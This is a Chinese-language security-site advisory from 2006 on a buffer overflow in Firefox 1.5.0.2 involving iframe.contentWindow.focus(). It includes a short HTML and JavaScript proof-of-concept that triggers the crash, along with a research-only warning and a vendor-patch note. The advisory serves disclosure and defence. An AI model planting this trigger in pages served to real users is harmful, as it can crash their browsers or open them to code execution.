Mozilla Firefox iframe.contentWindow.focus缓冲区溢出漏洞中华网络安全联盟 www.77941.com

首页 新闻中心 行业动态软件新闻安全资讯病毒预警漏洞发布 操作系统 Dos Win9x Win2000 WinXP Win2003 WinVista Linux Unix
数据库 DB2 Access MSSQL MySQL Oracle Sybase 编程技术 ASP PHP JSP CGI/Perl XML .Net C/C++/C# VB VC Delphi Java 汇编
安全技术 安全教学工具介绍漏洞利用病毒防范入侵检测防火墙安全防范汉化破解攻击实例加密解密 进程知识 技术论坛

中华网络安全联盟 >> 新闻中心 >> 漏洞发布 >> Mozilla Firefox iframe.contentWindow.focus缓冲区溢出漏洞

Apache Tomcat远程信息
Advanced Poll common
GnuPG parse_comment缓
Sun sysinfo() Kernel
Microsoft IE Interne
Microsoft IE超长Cont
MiniBB news.php远程文
多种D-Link路由器UPNP

Mozilla Firefox iframe.contentWindow.focus缓冲区溢出漏洞

字体：小大

中华网络安全联盟 来源：转载 时间：2006-4-25 17:31:39

受影响系统：
Mozilla Firefox 1.5.0.2

描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 17671

Mozilla Firefox是一款流行的开放源码WEB浏览器。

Firefox处理有关iframe.contentWindow.focus()的js320.dll和xpcom_core.dll中某些JavaScript的方式存在缓冲区溢出漏洞。攻击者可以利用找个漏洞导致浏览器拒绝服务，也可能执行任意代码。

<*来源：chris （chris@cr-secure.net）

链接：http://70.103.141.167//vuln/ff.txt
*>

测试方法：
--------------------------------------------------------------------------------

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<textarea cols="0" rows="0" id="x_OtherInfo" name="x_OtherInfo"></textarea>
<script>
       var textarea = document.getElementsByName("x_OtherInfo");
       textarea=textarea.item(0);
           var htmlarea = document.createElement("div");
       htmlarea.className = "htmlarea";
       textarea.parentNode.insertBefore(htmlarea, textarea);
       var iframe = document.createElement("iframe");
       htmlarea.appendChild(iframe);
            var doc = iframe.contentWindow.document;
                 doc.designMode = "on";
                 doc.open();
                 doc.write("<iframe src=''>");
          iframe.contentWindow.focus()
doc.close();
</script>
</textarea>

建议：
--------------------------------------------------------------------------------
厂商补丁：

Mozilla
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.mozilla.org/

字体：小大